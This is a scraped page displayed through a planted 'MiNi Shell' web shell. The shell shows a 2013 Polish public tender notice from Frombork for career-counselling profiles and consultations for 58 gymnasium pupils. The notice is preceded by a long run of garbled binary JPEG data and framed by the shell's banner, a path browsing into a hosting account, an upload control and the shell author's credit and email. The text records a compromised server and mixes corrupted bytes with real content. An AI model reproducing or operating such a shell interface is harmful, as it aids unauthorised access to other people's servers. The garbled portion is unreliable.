JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130403/49585-N-2013.html

<p class="kh_header"><b>Frombork: Przedmiotem zamówienia jest wykonania na rzecz Zamawiającego Indywidualnych Profili Edukacyjno Zawodowych oraz przeprowadzenie na rzecz Zamawiającego usługi konsultacji indywidualnych w okresie od 22 kwietnia 2013 roku do 30 czerwca 2013 roku dla 58 uczniów Gimnazjum w Zespole Szkół we Fromborku. 
Działanie jest realizowane w ramach projektu Doradztwo zawodowe dla uczniów Gimnazjum we Fromborku współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 49585 - 2013; data zamieszczenia: 03.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy , ul. Młynarska 5 A, 14-530 Frombork, woj. warmińsko-mazurskie, tel. 55 2440660, faks 55 2440661.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.frombork.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonania na rzecz Zamawiającego Indywidualnych Profili Edukacyjno Zawodowych oraz przeprowadzenie na rzecz Zamawiającego usługi konsultacji indywidualnych w okresie od 22 kwietnia 2013 roku do 30 czerwca 2013 roku dla 58 uczniów Gimnazjum w Zespole Szkół we Fromborku. 
Działanie jest realizowane w ramach projektu Doradztwo zawodowe dla uczniów Gimnazjum we Fromborku współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie Indywidualnych Profili Edukacyjno-Zawodowych IPEZ przez doradcę zawodowego. 162h dydaktycznych 1h dydaktyczna  45min pracy doradcy zawodowego.
W ramach usługi Wykonawca musi 
1.Przeprowadzić indywidualne badania testami i kwestionariuszami diagnostycznymi 27 uczniów Gimnazjum we Fromborku. Testy i kwestionariusze niezbędne do przeprowadzenia badań:
NEO-FFI Practest - wersja elektroniczna.
Popularny Kwestionariusz Inteligencji Emocjonalnej PKIE - Practest - wersja elektroniczna.
Wielowymiarowy Kwestionariusz Preferencji WKP - Practest - wersja elektroniczna.
Test Preferencji i Predyspozycji Zawodowych Progra - wersja komputerowa.
Kwestionariusz Preferencji Zawodowych JOB-6 autor: Dr Sylwiusz Retowski - wersja papierowa.
Kwestionariusz Oceny Potrzeb autor: A. Paszkowska - Rogacz - wersja papierowa.
Test na przedsiębiorczość - Czy jesteś przedsiębiorcą - wersja papierowa.
Kwestionariusz zainteresowań zawodowych Facilitator s Manual for Job Finding Club, 1993 - wersja papierowa.
2.Przeprowadzić wywiad szkolny, wywiad społeczno-życiowy oraz wywiad wychowawcy klasy dla 27 uczniów Gimnazjum we Fromborku.
3.Opisać wyniki badań na podstawie testów i kwestionariuszy oraz wywiadów w formie indywidualnej broszury IPEZ dla 27 uczniów Gimnazjum we Fromborku , która zawierała będzie także propozycje wyboru przez nich szkół średnich, ewentualnych studiów oraz zawodu.
4.Zaplanować przeprowadzenie badań i wywiadów w porozumieniu z Zamawiającym. Badania i wywiady mogą odbywać się w dni powszednie w godzinach 8-16. 
5.Dostosować terminy realizacji badań i wywiadów, metody i narzędzia do potrzeb i możliwości uczestników.
6.Miejsce realizacji badań: Szkolny Ośrodek Kariery znajdujący się w Zespole Szkół we Fromborku, ul. Katedralna 9.
7.Zapewnić, po zakończeniu wykonywania indywidualnych badań i wywiadów, transport do domu uczestnikom zamieszkałym na terenie Gminy Frombork poza Fromborkiem 17 osób.
8.Dokumentować własną pracę poprzez: listy obecności, potwierdzenia przekazania IPEZ uczniom oraz rodzicom uczniów, sprawozdanie ze zrealizowanych działań oraz kopie wszelkich materiałów wyniki badań, wywiady, materiały przekazane uczestnikom, kopie IPEZ.
9.Przedłożyć wzory wszystkich dokumentów do akceptacji przez Zamawiającego, najpóźniej w dniu podpisania umowy.
10.Przestrzegać Wytycznych  dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, w szczególności w zakresie oznaczania dokumentacji potwierdzającej właściwą realizację zadania oraz informowania Uczestników o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.  
11.Realizować zadania zgodnie z Wytycznymi w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki oraz informować Zamawiającego o zaangażowaniu osoby realizującej zadanie, w realizację innych projektów finansowanych w ramach POKL oraz prowadzić i przedkładać Zamawiającemu ewidencję godzin i zadań realizowanych w ramach wszystkich projektów, w których osoba realizująca przedmiot zamówienia jest zaangażowana przez okres obowiązywania umowy.
Wykonanie konsultacji indywidualnych przez doradcę zawodowego. 152h dydaktycznych 1h dydaktyczna 45 minut pracy doradcy zawodowego.
W ramach usługi Wykonawca musi: 
1.Przeprowadzić konsultacje indywidualne dla 27 uczniów Gimnazjum we Fromborku dla których został wykonany IPEZ w celu przekazania uczniom wyników przeprowadzonych badań  oraz wniosków zawartych w IPEZ.  
2.Przeprowadzić konsultacje indywidualne dla 31 uczniów klas III Gimnazjum we Fromborku podczas których uczniowie uzyskają wszelkie informacje na temat szkół średnich w Braniewie i Elblągu, rekrutacji do tych szkół w roku 2013 oraz zapoznają się z dokumentacją, jaka należy złożyć w procesie rekrutacji do tych szkół.
3.Zaplanować przeprowadzenie konsultacji indywidualnych w porozumieniu z Zamawiającym. Konsultacje indywidualne mogą odbywać się w dni powszednie w godzinach 8-17. 
4.Dostosować terminy realizacji konsultacji indywidualnych do potrzeb i możliwości uczestników.
5.Miejsce realizacji konsultacji indywidualnych: Szkolny Ośrodek Kariery znajdujący się w Zespole Szkół we Fromborku, ul. Katedralna 9.
6.Zapewnić, po zakończeniu konsultacji indywidualnych, transport do domu uczestnikom zamieszkałym na terenie Gminy Frombork poza Fromborkiem 36 osób.
7.Dokumentować własną pracę poprzez: listy obecności, sprawozdanie ze zrealizowanych działań oraz kopie wszelkich materiałów przekazywanych uczestnikom.
8.Przedłożyć wzory wszystkich dokumentów do akceptacji przez Zamawiającego, najpóźniej w dniu podpisania umowy.
9.Przestrzegać Wytycznych  dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, w szczególności w zakresie oznaczania dokumentacji potwierdzającej właściwą realizację zadania oraz informowania Uczestników o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.  
10.Realizować zadania zgodnie z Wytycznymi w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki oraz informować Zamawiającego o zaangażowaniu osoby realizującej zadanie, w realizację innych projektów finansowanych w ramach POKL oraz prowadzić i przedkładać Zamawiającemu ewidencję godzin i zadań realizowanych w ramach wszystkich projektów, w których osoba realizująca przedmiot zamówienia jest zaangażowana przez okres obowiązywania umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeśli wykonawca posiada wpis do ewidencji szkół i placówek wydany przez wydział departament edukacji JST oraz osoba osoby wykonującae przedmiot zamówienia posiada dyplom doradcy zawodowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeżeli wykonawca przedłoży Zamawiającemu wraz z ofertą w odpowiedzi na niniejszy przetarg:
a)Dokumenty lub pisma potwierdzające, że osobaosoby wykonująca e przedmiot zamówienia ma doświadczenie w wykonywaniu Indywidualnych Profili Edukacyjno-Zawodowych i wykonał a ich do tej pory minimum 50 sztuk dla uczniów gimnazjum. Dokumentpismo powinno także zawierać informację, że Indywidualne Profile Edukacyjno-Zawodowe były wykonywane dla uczniów gimnazjum (13-16 lat) oraz, że były realizowane na podstawie wszystkich testów i kwestionariuszy oraz wywiadów wymienionych w SWIZ w punkcie: Przedmiot zamówienia oraz przedstawi 5 takich IPEZ, dotychczas wykonanych.
b)Dokumenty lub pisma potwierdzające, że wykonawca lub osoba wykonująca przedmiot zamówienia ma doświadczenie w realizacji zadań merytorycznych na rzecz uczniów gimnazjum (13-16 lat) w ramach projektów EFS POKL.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, jeśli wykonawca przedstawi cv i kopię dyplomu doradcy zawodowego osoby osób, które będą realizowały przedmiot zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie wykonywanej działalności i przedstawi kopię takiego ubezpieczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania spełniania warunków udziału w postępowaniu każdy z Wykonawców musi złożyć wraz z ofertą następujące oświadczenia i dokumenty
1.Kopię wisu do ewidencji szkół i placówek wydany przez wydział departament edukacji JST.
2.Kopię dokumentu ów lub pisma pism potwierdzających, że osoba wykonująca przedmiot zamówienia ma doświadczenie w wykonywaniu Indywidualnych Profili Edukacyjno-Zawodowych i wykonał a ich do tej pory minimum 50 sztuk dla uczniów gimnazjum. Dokument pismo powinno być wystawione przez gimnazjum lub zespół szkół lub JST lub jednostkę budżetową JST na rzecz którego były realizowane IPEZ, a także zawierać informację, że Indywidualne Profile Edukacyjno-Zawodowe były wykonywane dla uczniów gimnazjum 13 16 lat oraz, że były realizowane na podstawie wszystkich testów i kwestionariuszy oraz wywiadów wymienionych w SIWZ w punkcie: Przedmiot zamówienia.
3.5 kopii przykładowych IPEZ wykonanych dla uczniów gimnazjum na podstawie wszystkich testów i kwestionariuszy oraz wywiadów wymienionych SIWZ w punkcie: Przedmiot zamówienia.
4.Kopie dokumentów potwierdzające kwalifikacje osoby osób, które będą realizowały przedmiot zamówienia: cv, dyplom doradcy zawodowego, dokumenty potwierdzające realizację zadań w projektach EFS POKL oraz na rzecz uczniów gimnazjum.
5.Oświadczenie o spełnianiu warunków udziału w postępowaniu.
6.Oświadczenie o podstawie do wykluczenia z udziału w postępowaniu (art. 24 pzp).
Ocena spełniania warunków udziału w postępowaniu dokonana zostanie na podstawie złożonych kopii dokumentów i oświadczeń w kryterium spełnia-nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.frombork.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Frombork ul. Młynarska 5 a, 14-530 Frombork lub faksem na Nr 55 244 06 61..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2013 godzina 10:00, miejsce: Ofertę należy złożyć w wymaganym terminie do siedziby Zamawiającego na adres Urząd Miasta i Gminy Frombork, Sekretariat  pokój Nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com